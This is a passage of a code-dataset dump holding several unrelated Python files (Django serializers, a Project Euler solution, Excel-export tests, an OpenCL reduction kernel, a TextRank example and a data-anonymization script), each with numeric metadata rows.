    text = serializers.SerializerMethodField()

    class Meta:
        model = Table
        fields = ('id',
                  'name',
                  'text',
                  'description',
                  'update_url',
                  'delete_url'
                  )

    def get_text(self, obj):
        try:
            return obj.name
        except:
            return ''


class CreateListSerializer(serializers.ModelSerializer):
    class Meta:
        model = Table
        fields = ('id',
                  'name',
                  'description',
                  )

    def create(self, validated_data):
        instance = Table()
        instance.name = validated_data.get('name')
        if validated_data.get('description'):
            instance.description = validated_data.get('description')
        instance.save()
        return instance


class UpdateSerializer(serializers.ModelSerializer):
    class Meta:
        model = Table
        fields = ('id',
                  'name',
                  'description',
                  )

    def update(self, instance, validated_data):
        instance.name = validated_data.get('name', instance.name)
        instance.description = validated_data.get('description', instance.description)
        instance.save()
        return instance
| 27.180328
| 86
| 0.581423
| 145
| 1,658
| 6.544828
| 0.303448
| 0.09589
| 0.084299
| 0.060063
| 0.561644
| 0.515279
| 0.407798
| 0.149631
| 0.149631
| 0.149631
| 0
| 0
| 0.3269
| 1,658
| 60
| 87
| 27.633333
| 0.850358
| 0.020507
| 0
| 0.413043
| 0
| 0
| 0.090012
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065217
| false
| 0
| 0.043478
| 0
| 0.391304
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60d8e5a0116e064e77e230eb96c9a8d6cada4db5
| 525
|
py
|
Python
|
project_euler/problem_01/sol6.py
|
mudit-chopra/Python
|
5d186f16d1f6d497c95c28c0ced7134314f65168
|
[
"MIT"
] | null | null | null |
project_euler/problem_01/sol6.py
|
mudit-chopra/Python
|
5d186f16d1f6d497c95c28c0ced7134314f65168
|
[
"MIT"
] | null | null | null |
project_euler/problem_01/sol6.py
|
mudit-chopra/Python
|
5d186f16d1f6d497c95c28c0ced7134314f65168
|
[
"MIT"
] | null | null | null |
'''
Problem Statement:
If we list all the natural numbers below 10 that are multiples of 3 or 5,
we get 3, 5, 6 and 9. The sum of these multiples is 23.
Find the sum of all the multiples of 3 or 5 below N.
'''
from __future__ import print_function
try:
    raw_input  # Python 2
except NameError:
    raw_input = input  # Python 3

'''store multiples of 3 and 5 in a set and then add'''
n = int(input().strip())
l = set()
x = 3
y = 5
while x < n:
    l.add(x)
    x += 3
while y < n:
    l.add(y)
    y += 5
print(sum(l))
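# For comparison (illustrative, not part of the original solution): the same answer can be
# computed in O(1) with inclusion-exclusion instead of building a set, e.g. for n = 10:
#
#   def sum_of_multiples_below(k, n):
#       m = (n - 1) // k                   # count of positive multiples of k below n
#       return k * m * (m + 1) // 2        # k * (1 + 2 + ... + m)
#
#   sum_of_multiples_below(3, 10) + sum_of_multiples_below(5, 10) - sum_of_multiples_below(15, 10)  # -> 23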
| 21
| 73
| 0.638095
| 103
| 525
| 3.184466
| 0.504854
| 0.10061
| 0.109756
| 0.085366
| 0.091463
| 0
| 0
| 0
| 0
| 0
| 0
| 0.050761
| 0.249524
| 525
| 24
| 74
| 21.875
| 0.781726
| 0.415238
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.0625
| 0
| 0.0625
| 0.125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60d91e2f9fc2f2ed156791ead05310dd7eaf0d26
| 2,017
|
py
|
Python
|
jsonfallback/functions.py
|
laymonage/django-jsonfallback
|
6e70edd2dbab7d74230e4af48d160ea8c6a663fb
|
[
"Apache-2.0"
] | null | null | null |
jsonfallback/functions.py
|
laymonage/django-jsonfallback
|
6e70edd2dbab7d74230e4af48d160ea8c6a663fb
|
[
"Apache-2.0"
] | 2
|
2019-05-31T23:46:05.000Z
|
2019-06-02T06:54:54.000Z
|
jsonfallback/functions.py
|
laymonage/django-jsonfallback
|
6e70edd2dbab7d74230e4af48d160ea8c6a663fb
|
[
"Apache-2.0"
] | null | null | null |
import copy
from django.db import NotSupportedError
from django.db.models import Expression
from .fields import mysql_compile_json_path, postgres_compile_json_path, FallbackJSONField
class JSONExtract(Expression):
    def __init__(self, expression, *path, output_field=FallbackJSONField(), **extra):
        super().__init__(output_field=output_field)
        self.path = path
        self.source_expression = self._parse_expressions(expression)[0]
        self.extra = extra

    def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
        c = self.copy()
        c.is_summary = summarize
        c.source_expression = c.source_expression.resolve_expression(query, allow_joins, reuse, summarize, for_save)
        return c

    def as_postgresql(self, compiler, connection, function=None, template=None, arg_joiner=None, **extra_context):
        params = []
        arg_sql, arg_params = compiler.compile(self.source_expression)
        params.extend(arg_params)
        json_path = postgres_compile_json_path(self.path)
        params.append(json_path)
        template = '{} #> %s'.format(arg_sql)
        return template, params

    def as_mysql(self, compiler, connection, function=None, template=None, arg_joiner=None, **extra_context):
        params = []
        arg_sql, arg_params = compiler.compile(self.source_expression)
        params.extend(arg_params)
        json_path = mysql_compile_json_path(self.path)
        params.append(json_path)
        template = 'JSON_EXTRACT({}, %s)'.format(arg_sql)
        return template, params

    def as_sql(self, compiler, connection, function=None, template=None, arg_joiner=None, **extra_context):
        raise NotSupportedError(
            'Functions on JSONFields are only supported on PostgreSQL and MySQL at the moment.'
        )

    def copy(self):
        c = super().copy()
        c.source_expression = copy.copy(self.source_expression)
        c.extra = self.extra.copy()
        return c
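# Illustrative usage (not part of the original module; the Profile model and its `data`
# JSON field are hypothetical):
#
#   from jsonfallback.functions import JSONExtract
#
#   # annotates each row with data -> 'settings' -> 'theme'; compiled to `#>` on
#   # PostgreSQL and to JSON_EXTRACT(...) on MySQL by the methods above
#   Profile.objects.annotate(theme=JSONExtract('data', 'settings', 'theme'))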
| 41.163265
| 116
| 0.695092
| 248
| 2,017
| 5.407258
| 0.282258
| 0.047726
| 0.044743
| 0.067114
| 0.447427
| 0.447427
| 0.418345
| 0.418345
| 0.418345
| 0.36167
| 0
| 0.000625
| 0.206247
| 2,017
| 48
| 117
| 42.020833
| 0.836977
| 0
| 0
| 0.3
| 0
| 0
| 0.054041
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15
| false
| 0
| 0.1
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60d99db002da009becee8998564d797726db9d1f
| 6,460
|
py
|
Python
|
excelify/tests.py
|
pmbaumgartner/excelify
|
c0e29733efe407248810c3a8d3ec874f0cc0daca
|
[
"MIT"
] | 11
|
2018-02-12T16:57:26.000Z
|
2021-03-12T03:04:53.000Z
|
excelify/tests.py
|
pmbaumgartner/excelify
|
c0e29733efe407248810c3a8d3ec874f0cc0daca
|
[
"MIT"
] | 1
|
2018-02-04T20:53:35.000Z
|
2018-02-04T22:08:35.000Z
|
excelify/tests.py
|
pmbaumgartner/excelify
|
c0e29733efe407248810c3a8d3ec874f0cc0daca
|
[
"MIT"
] | null | null | null |
import unittest
import tempfile
import pathlib
import datetime
import warnings
from IPython.testing.globalipapp import start_ipython, get_ipython
import pandas.util.testing as tm
from pandas.core.frame import DataFrame
from pandas.core.series import Series
from pandas import read_excel
import pytest
ip = get_ipython()
ip.magic('load_ext excelify')
class TestMagicExportImport(unittest.TestCase):
def setUp(self):
self.tempexcel = tempfile.NamedTemporaryFile(suffix='.xlsx')
def test_series(self):
series = Series()
excel_name = self.tempexcel.name
ip.run_line_magic('excel', 'series -f {filepath}'.format(filepath=excel_name))
loaded_series = read_excel(excel_name, squeeze=True, dtype=series.dtype)
tm.assert_series_equal(series, loaded_series, check_names=False)
def test_dataframe(self):
df = DataFrame()
excel_name = self.tempexcel.name
ip.run_line_magic('excel', 'df -f {filepath}'.format(filepath=excel_name))
loaded_df = read_excel(excel_name, dtype=df.dtypes)
tm.assert_frame_equal(df, loaded_df, check_names=False)
def test_sheet_name(self):
series = Series()
excel_name = self.tempexcel.name
sheetname = 'test_sheet_name'
ip.run_line_magic('excel', 'series -f {filepath} -s {sheetname}'.format(filepath=excel_name, sheetname=sheetname))
loaded_excel = read_excel(excel_name, sheet_name=None)
assert 'test_sheet_name' in loaded_excel
def test_all_pandas_objects(self):
df1 = DataFrame()
df2 = DataFrame()
series1 = Series()
series2 = Series()
pandas_objects = [(name, obj) for (name, obj) in locals().items()
if isinstance(obj, (DataFrame, Series))]
excel_name = self.tempexcel.name
ip.run_line_magic('excel_all', '-f {filepath}'.format(filepath=excel_name))
for (name, obj) in pandas_objects:
if isinstance(obj, Series):
loaded_data = read_excel(excel_name, sheet_name=name, squeeze=True, dtype=obj.dtype)
tm.assert_series_equal(obj, loaded_data, check_names=False)
elif isinstance(obj, DataFrame):
loaded_data = read_excel(excel_name, sheet_name=name, dtype=obj.dtypes)
tm.assert_frame_equal(obj, loaded_data, check_names=False)
def test_sheet_timestamp(self):
series = Series()
excel_name = self.tempexcel.name
ip.run_line_magic('excel', 'series -f {filepath}'.format(filepath=excel_name))
loaded_excel = read_excel(excel_name, sheet_name=None)
sheet_names = list(loaded_excel.keys())
for sheet in sheet_names:
_, date_string = sheet.split('_')
saved_date = datetime.datetime.strptime(date_string, "%Y%m%d-%H%M%S")
load_to_read = datetime.datetime.now() - saved_date
# there is probably a better way to test this
assert load_to_read.seconds < 10
def test_all_long_name(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
locals().update({'a' * 33 : Series()})
excel_name = self.tempexcel.name
ip.run_line_magic('excel_all', '-f {filepath}'.format(filepath=excel_name))
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert "truncated" in str(w[-1].message)
def test_long_name_provided(self):
with warnings.catch_warnings(record=True) as w:
series = Series()
excel_name = self.tempexcel.name
longsheet = 'a' * 33
ip.run_line_magic('excel', 'series -f {filepath} -s {longsheet}'.format(filepath=excel_name, longsheet=longsheet))
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert "truncated" in str(w[-1].message)
def test_long_name_default(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
longsheet = 'a' * 33
locals().update({longsheet : Series()})
excel_name = self.tempexcel.name
ip.run_line_magic('excel', '{longsheet} -f {filepath}'.format(longsheet=longsheet, filepath=excel_name))
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert "truncated" in str(w[-1].message)
def tearDown(self):
self.tempexcel.close()
def test_filename():
series = Series()
ip.run_line_magic('excel', 'series')
excel_name = list(pathlib.Path().glob('series_*.xlsx'))[0]
assert excel_name.exists()
excel_name.unlink()
def test_all_filename():
series = Series()
df = DataFrame()
ip.run_line_magic('excel_all', '')
excel_name = list(pathlib.Path().glob('all_data_*.xlsx'))[0]
assert excel_name.exists()
excel_name.unlink()
@pytest.fixture
def no_extension_file():
file = tempfile.NamedTemporaryFile()
yield file
file.close()
def test_filepath_append(no_extension_file):
series = Series()
excel_name = no_extension_file.name
ip.run_line_magic('excel', 'series -f {filepath}'.format(filepath=excel_name))
exported_filepath = pathlib.PurePath(excel_name + '.xlsx')
assert exported_filepath.suffix == '.xlsx'
def test_all_filepath_append(no_extension_file):
series = Series()
df = DataFrame()
excel_name = no_extension_file.name
ip.run_line_magic('excel_all', '-f {filepath}'.format(filepath=excel_name))
exported_filepath = pathlib.Path(excel_name + '.xlsx')
exported_filepath = pathlib.PurePath(excel_name + '.xlsx')
assert exported_filepath.suffix == '.xlsx'
def test_no_object():
with pytest.raises(NameError):
ip.run_line_magic('excel', 'nonexistantobject')
def test_non_pandas_object():
integer = 3
with pytest.raises(TypeError):
ip.run_line_magic('excel', 'integer')
string = 'string'
with pytest.raises(TypeError):
ip.run_line_magic('excel', 'string')
def test_all_no_objects():
with pytest.raises(RuntimeError):
ip.run_line_magic('excel_all', '')
def test_all_too_many_objects():
# this seems like a bad idea...
for i in range(102):
locals().update({'series' + str(i) : Series()})
with pytest.raises(RuntimeError):
ip.run_line_magic('excel_all', '')
| 37.34104
| 126
| 0.658204
| 818
| 6,460
| 4.964548
| 0.185819
| 0.077567
| 0.037675
| 0.058606
| 0.574243
| 0.54297
| 0.508003
| 0.452844
| 0.442502
| 0.327013
| 0
| 0.005375
| 0.222446
| 6,460
| 172
| 127
| 37.55814
| 0.803106
| 0.0113
| 0
| 0.422535
| 0
| 0
| 0.08272
| 0
| 0
| 0
| 0
| 0
| 0.133803
| 1
| 0.133803
| false
| 0
| 0.084507
| 0
| 0.225352
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60db6ae3957694fa22eea77ea766c2665fc6212f
| 13,015
|
py
|
Python
|
gputools/core/oclmultireduction.py
|
gmazzamuto/gputools
|
73a4dee76a119f94d8163781a85b691fd080d506
|
[
"BSD-3-Clause"
] | 89
|
2015-08-28T14:17:33.000Z
|
2022-01-20T16:19:34.000Z
|
gputools/core/oclmultireduction.py
|
gmazzamuto/gputools
|
73a4dee76a119f94d8163781a85b691fd080d506
|
[
"BSD-3-Clause"
] | 24
|
2015-08-28T19:06:22.000Z
|
2022-02-21T21:10:13.000Z
|
gputools/core/oclmultireduction.py
|
gmazzamuto/gputools
|
73a4dee76a119f94d8163781a85b691fd080d506
|
[
"BSD-3-Clause"
] | 17
|
2015-08-28T18:56:43.000Z
|
2021-09-15T23:15:36.000Z
|
"""
an adaptation of pyopencl's reduction kernel for weighted avarages
like sum(a*b)
mweigert@mpi-cbg.de
"""
from __future__ import print_function, unicode_literals, absolute_import, division
from six.moves import zip
import pyopencl as cl
from pyopencl.tools import (
context_dependent_memoize,
dtype_to_ctype, KernelTemplateBase,
_process_code_for_macro)
import numpy as np
from gputools import get_device
import sys
# {{{ kernel source
KERNEL = r"""//CL//
<%
inds = range(len(map_exprs))
%>
#define GROUP_SIZE ${group_size}
% for i,m in enumerate(map_exprs):
#define READ_AND_MAP_${i}(i) (${m})
% endfor
#define REDUCE(a, b) (${reduce_expr})
% if double_support:
#if __OPENCL_C_VERSION__ < 120
#pragma OPENCL EXTENSION cl_khr_fp64: enable
#endif
#define PYOPENCL_DEFINE_CDOUBLE
% endif
#include <pyopencl-complex.h>
${preamble}
typedef ${out_type} out_type;
__kernel void ${name}(
% for i in inds:
__global out_type *out__base_${i},
% endfor
long out__offset, ${arguments},
unsigned int seq_count, unsigned int n)
{
% for i in inds:
__global out_type *out_${i} = (__global out_type *) (
(__global char *) out__base_${i} + out__offset);
% endfor
${arg_prep}
% for i in inds:
__local out_type ldata_${i}[GROUP_SIZE];
out_type acc_${i} = ${neutral};
% endfor
unsigned int lid = get_local_id(0);
unsigned int i = get_group_id(0)*GROUP_SIZE*seq_count + lid;
//printf("seq: %d\tlid = %d\ti=%d\n",seq_count,lid,i);
for (unsigned s = 0; s < seq_count; ++s)
{
if (i >= n)
break;
% for i in inds:
acc_${i} = REDUCE(acc_${i}, READ_AND_MAP_${i}(i));
% endfor
i += GROUP_SIZE;
}
% for i in inds:
ldata_${i}[lid] = acc_${i};
% endfor
<%
cur_size = group_size
%>
% while cur_size > 1:
barrier(CLK_LOCAL_MEM_FENCE);
<%
new_size = cur_size // 2
assert new_size * 2 == cur_size
%>
if (lid < ${new_size})
{
% for i in inds:
ldata_${i}[lid] = REDUCE(
ldata_${i}[lid],
ldata_${i}[lid + ${new_size}]);
% endfor
}
<% cur_size = new_size %>
% endwhile
if (lid == 0) {
% for i in inds:
out_${i}[get_group_id(0)] = ldata_${i}[0];
% endfor
//printf("result: %.4f\n",out_0[get_group_id(0)] );
}
}
"""
def _get_reduction_source(
ctx, out_type, out_type_size,
neutral, reduce_expr, map_exprs, parsed_args,
name="reduce_kernel", preamble="", arg_prep="",
device=None, max_group_size=None):
if device is not None:
devices = [device]
else:
devices = ctx.devices
# {{{ compute group size
def get_dev_group_size(device):
# dirty fix for the RV770 boards
max_work_group_size = device.max_work_group_size
if "RV770" in device.name:
max_work_group_size = 64
# compute lmem limit
from pytools import div_ceil
lmem_wg_size = div_ceil(max_work_group_size, out_type_size)
result = min(max_work_group_size, lmem_wg_size)
# round down to power of 2
from pyopencl.tools import bitlog2
return 2**bitlog2(result)
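# Illustrative note (not in the original source): if `result` were 384 here,
# bitlog2(384) is 8, so the group size rounds down to 2**8 = 256.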
group_size = min(get_dev_group_size(dev) for dev in devices)
if max_group_size is not None:
group_size = min(max_group_size, group_size)
# }}}
from mako.template import Template
from pytools import all
from pyopencl.characterize import has_double_support
src = str(Template(KERNEL).render(
out_type=out_type,
arguments=", ".join(arg.declarator() for arg in parsed_args),
group_size=group_size,
neutral=neutral,
reduce_expr=_process_code_for_macro(reduce_expr),
map_exprs=[_process_code_for_macro(m) for m in map_exprs],
name=name,
preamble=preamble,
arg_prep=arg_prep,
double_support=all(has_double_support(dev) for dev in devices),
))
# sys.exit()
from pytools import Record
class ReductionInfo(Record):
pass
return ReductionInfo(
context=ctx,
source=src,
group_size=group_size)
def get_reduction_kernel(stage,
ctx, dtype_out,
neutral, reduce_expr, arguments=None,
name="reduce_kernel", preamble="",
map_exprs = None,
device=None, options=[], max_group_size=None):
if map_exprs is None:
raise ValueError("map_exprs has to be given!")
for i, m in enumerate(map_exprs):
if m is None:
if stage==2:
map_exprs[i] = "pyopencl_reduction_inp_%i[i]"%i
else:
map_exprs[i] = "in[i]"
from pyopencl.tools import (
parse_arg_list, get_arg_list_scalar_arg_dtypes,
get_arg_offset_adjuster_code, VectorArg)
arg_prep = ""
if stage==1 and arguments is not None:
arguments = parse_arg_list(arguments, with_offset=True)
arg_prep = get_arg_offset_adjuster_code(arguments)
if stage==2 and arguments is not None:
arguments = parse_arg_list(arguments)
arguments = (
[VectorArg(dtype_out, "pyopencl_reduction_inp_%i"%i) for i in range(len(map_exprs))]
+arguments)
inf = _get_reduction_source(
ctx, dtype_to_ctype(dtype_out), dtype_out.itemsize,
neutral, reduce_expr, map_exprs, arguments,
name, preamble, arg_prep, device, max_group_size)
inf.program = cl.Program(ctx, inf.source)
inf.program.build(options)
inf.kernel = getattr(inf.program, name)
inf.arg_types = arguments
inf.kernel.set_scalar_arg_dtypes(
[None, ]*len(map_exprs)+[np.int64]
+get_arg_list_scalar_arg_dtypes(inf.arg_types)
+[np.uint32]*2)
return inf
# }}}
# {{{ main reduction kernel
class OCLMultiReductionKernel:
"""
simultaneous reduction of a weighted sum over several buffers
example:
k = OCLMultiReductionKernel(np.float32,
neutral="0", reduce_expr="a+b",
map_exprs=["x[i]", "x[i]*y[i]"],
arguments="__global float *x, __global float *y")
k(a, b, outs=[out1, out2])
"""
def __init__(self, dtype_out,
neutral, reduce_expr, arguments=None,
map_exprs=[None],
name="reduce_kernel", options=[], preamble=""):
ctx = get_device().context
dtype_out = self.dtype_out = np.dtype(dtype_out)
max_group_size = None
trip_count = 0
self.n_exprs = len(map_exprs)
assert self.n_exprs>0
while True:
self.stage_1_inf = get_reduction_kernel(1, ctx,
dtype_out,
neutral, reduce_expr, arguments,
name=name+"_stage1", options=options, preamble=preamble,
map_exprs=map_exprs,
max_group_size=max_group_size)
kernel_max_wg_size = self.stage_1_inf.kernel.get_work_group_info(
cl.kernel_work_group_info.WORK_GROUP_SIZE,
ctx.devices[0])
if self.stage_1_inf.group_size<=kernel_max_wg_size:
break
else:
max_group_size = kernel_max_wg_size
trip_count += 1
assert trip_count<=2
self.stage_2_inf = get_reduction_kernel(2, ctx,
dtype_out,
neutral, reduce_expr, arguments=arguments,
name=name+"_stage2", options=options,
map_exprs = [None]*self.n_exprs,
preamble=preamble,
max_group_size=max_group_size)
from pytools import any
from pyopencl.tools import VectorArg
assert any(
isinstance(arg_tp, VectorArg)
for arg_tp in self.stage_1_inf.arg_types), \
"ReductionKernel can only be used with functions " \
"that have at least one vector argument"
def __call__(self, *args, **kwargs):
MAX_GROUP_COUNT = 1024 # noqa
SMALL_SEQ_COUNT = 4 # noqa
from pyopencl.array import empty
stage_inf = self.stage_1_inf
queue = kwargs.pop("queue", None)
wait_for = kwargs.pop("wait_for", None)
return_event = kwargs.pop("return_event", False)
outs = kwargs.pop("outs", [None]*self.n_exprs)
if kwargs:
raise TypeError("invalid keyword argument to reduction kernel")
stage1_args = args
while True:
invocation_args = []
vectors = []
from pyopencl.tools import VectorArg
for arg, arg_tp in zip(args, stage_inf.arg_types):
if isinstance(arg_tp, VectorArg):
if not arg.flags.forc:
raise RuntimeError("ReductionKernel cannot "
"deal with non-contiguous arrays")
vectors.append(arg)
invocation_args.append(arg.base_data)
if arg_tp.with_offset:
invocation_args.append(arg.offset)
else:
invocation_args.append(arg)
repr_vec = vectors[0]
sz = repr_vec.size
if queue is not None:
use_queue = queue
else:
use_queue = repr_vec.queue
if sz<=stage_inf.group_size*SMALL_SEQ_COUNT*MAX_GROUP_COUNT:
total_group_size = SMALL_SEQ_COUNT*stage_inf.group_size
group_count = (sz+total_group_size-1)//total_group_size
seq_count = SMALL_SEQ_COUNT
else:
group_count = MAX_GROUP_COUNT
macrogroup_size = group_count*stage_inf.group_size
seq_count = (sz+macrogroup_size-1)//macrogroup_size
if group_count==1:
results = [empty(use_queue,
(), self.dtype_out,
allocator=repr_vec.allocator) if out is None else out for out in outs]
else:
results = [empty(use_queue,
(group_count,), self.dtype_out,
allocator=repr_vec.allocator) for out in outs]
last_evt = stage_inf.kernel(
use_queue,
(group_count*stage_inf.group_size,),
(stage_inf.group_size,),
*([r.base_data for r in results]+[results[0].offset,]
+invocation_args+[seq_count, sz]),
**dict(wait_for=wait_for))
wait_for = [last_evt]
#print "ooooo ", group_count, len(args)
if group_count==1:
if return_event:
return results, last_evt
else:
return results
else:
stage_inf = self.stage_2_inf
args = tuple(results)+stage1_args
#args = (results[0],)+stage1_args
if __name__=='__main__':
from gputools import OCLArray, OCLReductionKernel
k1 = OCLReductionKernel(np.float32,
neutral="0", reduce_expr="a+b",
map_expr="x[i]",
arguments="__global float *x")
k2 = OCLMultiReductionKernel(np.float32,
neutral="0", reduce_expr="a+b",
map_exprs=["y[i]*x[i]","x[i]"],
arguments="__global float *x, __global float *y")
N = 512
a = OCLArray.from_array(np.ones((N,N),np.float32))
b = OCLArray.from_array(2.*np.ones((N,N),np.float32))
o1 = OCLArray.empty((),np.float32)
o2 = OCLArray.empty((),np.float32)
from time import time
t = time()
for _ in range(400):
k1(a)
k1(b)
k1(a).get()
k1(b).get()
print(time()-t)
t = time()
#print k2(a,b, outs = [o1,o2])
for _ in range(400):
k2(a[0],b[0], outs = [o1,o2])
o1.get()
print(time()-t)
# open("kern_new_1.txt","w").write(("%s"%k2.stage_1_inf).replace("\\n","\n"))
# open("kern_new_2.txt","w").write(("%s"%k2.stage_2_inf).replace("\\n","\n"))
| 28.417031
| 108
| 0.542374
| 1,553
| 13,015
| 4.251127
| 0.188023
| 0.057255
| 0.019994
| 0.010603
| 0.203878
| 0.145259
| 0.106483
| 0.05665
| 0.031506
| 0.026659
| 0
| 0.0146
| 0.357972
| 13,015
| 457
| 109
| 28.479212
| 0.775491
| 0.063388
| 0
| 0.18543
| 0
| 0.003311
| 0.224889
| 0.02573
| 0
| 0
| 0
| 0
| 0.013245
| 1
| 0.016556
| false
| 0.003311
| 0.066225
| 0
| 0.10596
| 0.016556
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60de65cd7b893d039ce64092d8888cd693558525
| 831
|
py
|
Python
|
example/example01.py
|
ChenglongChen/TextRank4ZH
|
5af7b9d33d9e686411576362dfccf6f9d3d3282b
|
[
"MIT"
] | 2
|
2016-09-08T11:39:09.000Z
|
2016-11-29T14:04:38.000Z
|
example/example01.py
|
ChenglongChen/TextRank4ZH
|
5af7b9d33d9e686411576362dfccf6f9d3d3282b
|
[
"MIT"
] | null | null | null |
example/example01.py
|
ChenglongChen/TextRank4ZH
|
5af7b9d33d9e686411576362dfccf6f9d3d3282b
|
[
"MIT"
] | 5
|
2017-03-03T03:18:32.000Z
|
2018-09-18T02:46:27.000Z
|
#-*- encoding:utf-8 -*-
from __future__ import print_function
import sys
try:
reload(sys)
sys.setdefaultencoding('utf-8')
except:
pass
import codecs
from textrank4zh import TextRank4Keyword, TextRank4Sentence
text = codecs.open('../test/doc/01.txt', 'r', 'utf-8').read()
tr4w = TextRank4Keyword()
tr4w.analyze(text=text, lower=True, window=2)   # in py2, `text` must be a utf-8 encoded str or a unicode object; in py3 it must be utf-8 encoded bytes or a str object
print( '关键词:' )  # "Keywords:"
for item in tr4w.get_keywords(20, word_min_len=1):
print(item.word, item.weight)
print()
print( '关键短语:' )  # "Key phrases:"
for phrase in tr4w.get_keyphrases(keywords_num=20, min_occur_num= 2):
print(phrase)
tr4s = TextRank4Sentence()
tr4s.analyze(text=text, lower=True, source = 'all_filters')
print()
print( '摘要:' )  # "Summary:"
for item in tr4s.get_key_sentences(num=3):
print(item.weight, item.sentence)
| 24.441176
| 109
| 0.731649
| 113
| 831
| 5.247788
| 0.530973
| 0.020236
| 0.05059
| 0.067454
| 0.080944
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04
| 0.127557
| 831
| 34
| 110
| 24.441176
| 0.777931
| 0.098676
| 0
| 0.08
| 0
| 0
| 0.069519
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.04
| 0.16
| 0
| 0.16
| 0.36
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60de82d5bb8ba90b967a1ecc746d150756ee64d4
| 1,833
|
py
|
Python
|
scripts/anonymize_dumpdata.py
|
suutari-ai/respa
|
a944b1c13f855eaf5f883687b5fd025ece7c8176
|
[
"MIT"
] | 1
|
2018-11-13T06:03:27.000Z
|
2018-11-13T06:03:27.000Z
|
scripts/anonymize_dumpdata.py
|
suutari-ai/respa
|
a944b1c13f855eaf5f883687b5fd025ece7c8176
|
[
"MIT"
] | 1
|
2020-06-12T08:58:58.000Z
|
2020-06-12T08:58:58.000Z
|
scripts/anonymize_dumpdata.py
|
suutari-ai/respa
|
a944b1c13f855eaf5f883687b5fd025ece7c8176
|
[
"MIT"
] | null | null | null |
import random
import uuid
import sys
import json
from faker import Factory
from faker.providers.person.fi_FI import Provider as PersonProvider
fake = Factory.create('fi_FI')
email_by_user = {}
users_by_id = {}
def anonymize_users(users):
usernames = set()
emails = set()
for data in users:
if data['model'] != 'users.user':
continue
user = data['fields']
user['password'] = "!"
username = fake.user_name()
while username in usernames:
username = fake.user_name()
usernames.add(username)
user['username'] = username
user['uuid'] = str(uuid.uuid4())
if user['first_name']:
user['first_name'] = fake.first_name()
if user['last_name']:
user['last_name'] = fake.last_name()
user['email'] = fake.email()
email_by_user[data['pk']] = user['email']
users_by_id[data['pk']] = user
def remove_secrets(data):
for model in data:
fields = model['fields']
if model['model'] == 'socialaccount.socialapp':
fields['client_id'] = fake.md5()
fields['secret'] = fake.md5()
elif model['model'] == 'socialaccount.socialtoken':
fields['token_secret'] = fake.md5()
fields['token'] = fake.md5()
elif model['model'] == 'account.emailaddress':
fields['email'] = email_by_user[fields['user']]
elif model['model'] == 'socialaccount.socialaccount':
fields['extra_data'] = '{}'
fields['uid'] = users_by_id[fields['user']]['uuid']
elif model['model'] == 'sessions.session':
fields['session_data'] = "!"
model['pk'] = fake.md5()
data = json.load(sys.stdin)
anonymize_users(data)
remove_secrets(data)
json.dump(data, sys.stdout, indent=4)
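# Typical invocation (file names are illustrative; assumes a Django `dumpdata` JSON export):
#   python anonymize_dumpdata.py < dump.json > anonymized.json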
| 31.067797
| 67
| 0.582106
| 213
| 1,833
| 4.868545
| 0.300469
| 0.048216
| 0.054002
| 0.038573
| 0.104147
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005178
| 0.262411
| 1,833
| 58
| 68
| 31.603448
| 0.761834
| 0
| 0
| 0.039216
| 0
| 0
| 0.173486
| 0.039825
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039216
| false
| 0.019608
| 0.117647
| 0
| 0.156863
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60ded314d6e25af4b6bb277bc0ff9652a4d9cb93
| 12,252
|
py
|
Python
|
torch_geometric/utils/negative_sampling.py
|
